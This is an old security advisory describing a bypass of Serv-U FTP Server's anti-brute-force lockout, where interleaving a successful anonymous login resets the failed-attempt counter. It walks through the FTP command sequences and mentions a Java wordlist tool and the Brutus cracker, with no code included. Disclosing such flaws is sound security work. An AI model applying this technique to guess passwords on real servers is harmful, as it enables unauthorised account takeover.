[ SOURCE: http://www.secureroot.com/security/advisories/9735758202.html ] Brute Forcing FTP Servers with enabled anti-hammering (ant brute-force) modus ----------------------------------------------------------------------------- While playing around with Serv-U FTP Server, I found out that it is possible to bypass it's hammering protection which should protect accounts from being brute-forced. In the following text I will explain this step by step. A user logs into an ftp server like this: USER USERNAME PASS PASSWORD When the user entered an invalid password for 3 times he will be disconnected and is not allowed to connect again for a specified time - so far so good, but i wondered what happened if I tried another users account in order to try 3 passwords for every user per connection (lines with the prefix ">" are from the server) : USER USER1 >331 User name okay, need password. PASS PASSWORD >530 Not logged in. USER USER1 >331 User name okay, need password. PASS nextpassPASSWORD >530 Not logged in. USER USER2 >331 User name okay, need password. PASS anotherPASSWORD >530 Not logged in. I was disconnected, and already about to give up when I noticed that anonymous login was enabled: USER USER1 >331 User name okay, need password. PASS PASSWORD >530 Not logged in. USER USER1 >331 User name okay, need password. PASS nextpassPASSWORD >530 Not logged in. USER anonymous >331 User name okay, please send complete E-mail address as password. PASS somemail@address.com >230 User logged in, proceed. USER USERNAME >331 User name okay, need password. PASS 3rdPASSWORD >530 Not logged in. USER USERNAME >331 User name okay, need password. PASS 4thPASSWORD >530 Not logged in. ... ... BINGO! That worked! This does not only work with anonymous access, you just need to log into an account and then you can retry to log into the user's account! I coded a little program in java to automate the brute forcing process which reads the passwords from a wordlist. In my local network it tested about 100 passwords per minute - that is not very fast, but it only uses one connection and as far as i know it's the only tool that bypasses the anti brute-force function... Brutus-aet2 (with 10 connections, 10ms timeout, disabled anti-hammering of course) made 20 tries per second - my program is only single-threaded, but if its method was implented into brutus-aet3 it might be the fastest ftp brute-force tool ever :) - Craig Craig@Freenet.de http://www.HaQuarter.De (only German yet) Download Brutus at http://www.hobbie.net/brutus P.S.:Before writing this, I did a quick search at securityfocus, but i did not find anything about this issue, if this was already known i am sorry for wasting your time! --------------------------------------------------------------------------------